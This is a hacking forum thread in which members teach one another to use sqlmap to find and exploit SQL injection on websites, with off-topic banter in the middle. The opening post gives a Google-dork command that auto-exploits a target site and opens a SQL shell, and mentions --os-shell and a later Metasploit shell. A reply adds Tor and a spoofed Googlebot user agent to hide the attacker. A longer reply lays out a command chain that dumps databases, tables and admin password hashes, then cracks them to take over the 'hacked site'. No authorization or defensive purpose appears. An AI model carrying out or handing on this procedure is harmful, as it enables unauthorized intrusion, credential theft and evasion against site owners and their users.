(Basic) SQLmap

[Rawr girl]

How many of u have heard of "SQL injection?" ah I see a few hands raised... Good good. Well for all u ppl who didn't raise ur hand... SQL injection is a method of injecting SQL database code into a web site with SQL software.

If u do this by hand it's a depressing long process of usually failure. Buut... We has a lil tool that will make it quick and easy

It's called SQLmap.

After u download it from our repo, open up terminal and cd into /var/mobile/pentest/database/sqlmap


Once in there, u run SQLmap with python. For this tut I'll be showing u how to use google with SQLmap to search a site for a vulnerable page then auto exploit it
Type in python sqlmap.py --sql-shell -g "site:sitename.com ext:php"

Now this will tell SQLmap to search google for any pages on the target site that have the extension php and that when it successfully exploits a page, to open up an SQL database shell to execute SQL code on the site.

So now sit back and enjoy... it will inform u bout the attack as it goes on.
I highly suggest reading the SQLmap manual. It's well written and will help u to eventually get a metasploit shell on the server!

[A12danrulz]

Add some useful SQL shell commands

[Rawr girl]

I don't remember any

[Rawr girl]

If u want to find all the database tables you use --dump-all instead of --sql-shell

And if u know enough about the sever u can use the --os-shell

[lnfin8ty]

I believe you can use it with TOR as well with -tor. It's supposed to be used like:

~/sqlmap# ./sqlmap.py -u http://URL/index.php?cata_id=1 --dump-all –tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

So that it looks like a n anonymous google bot getting information from the website.

It's supposed to be THE tool for blind SQL injection too.

[Rawr girl]

Google ****s brix when ever I use -tor so I just have tor already on lol

[lnfin8ty]

Yeah that looks a lot easier. Lol.

[PaulBird]

thnx for tutorial rawr girl
[Removed Image ]

[PaulBird]

its NOT A MONKEY. its Jeramy Hilary Boob PhD.
^obv not a beatles fan

[PaulBird]

Not a good excuse haha, im 15, listen to rap. but love old stuff too

culture urself bro!

[PaulBird]

lmao a mexican indian???

[A3MIRAL]

ok enough here too please

[lnfin8ty]

So, l've been checking this out. l think it's basically blind injection, but here is what l understand. Please correct any mistakes.
We start with:
./sqlmap.py -u http://yoursitehere.com/vulnerablefile (might be user.php?id=5)
lf it found the Database version continue with:

./sqlmap.py -u http://yoursitehere.com/user.php?id=5 --dbs
That should show every database on the target system

Now you have to use the ‘-D’ flag and pass it the name of the database you want to attack, also pass it the ‘- -tables’ flag to obtain the table names:

./sqlmap.py -u http://yoursitehere.com/user.php?id=5 -D databasename --tables

This should return you the tables of the database.

The last step is to obtain the column names of the table we want to use, if we want to check more tables we seperate them with a ‘,’

./sqlmap.py -u http://yoursitehere.com/user.php?id=5 -D databasename -T tablename --columns

This should give you the users table of columns.

The “final” step is to find the admin credentials and decrypt them.
Query range is specified with ‘- -start x’ and ‘- -stop y’.
Because the admin normally is stored in the first row of the table we use this command:

./sqlmap.py -u http://yoursitehere.com/user.php?id=5 -D databasename -T tablename -C colum1, column2 --dump

Then you should see the md5 hash which you take to an online decrypter or whatever.
We can now login and do whatever we want with the hacked site.

SQL helper is a nice tool for an automated attack, but until they port it to iphone, l think SQLmap is the way to go.

[Rawr girl]

Whoa... U should make the advanced tut lol

[lnfin8ty]

Yeah Sorry Rawr girl,
From what l read l thought that was a basic example. I've got a good book on SQL injection and it goes over SQLmap and the advanced stuff is very deep.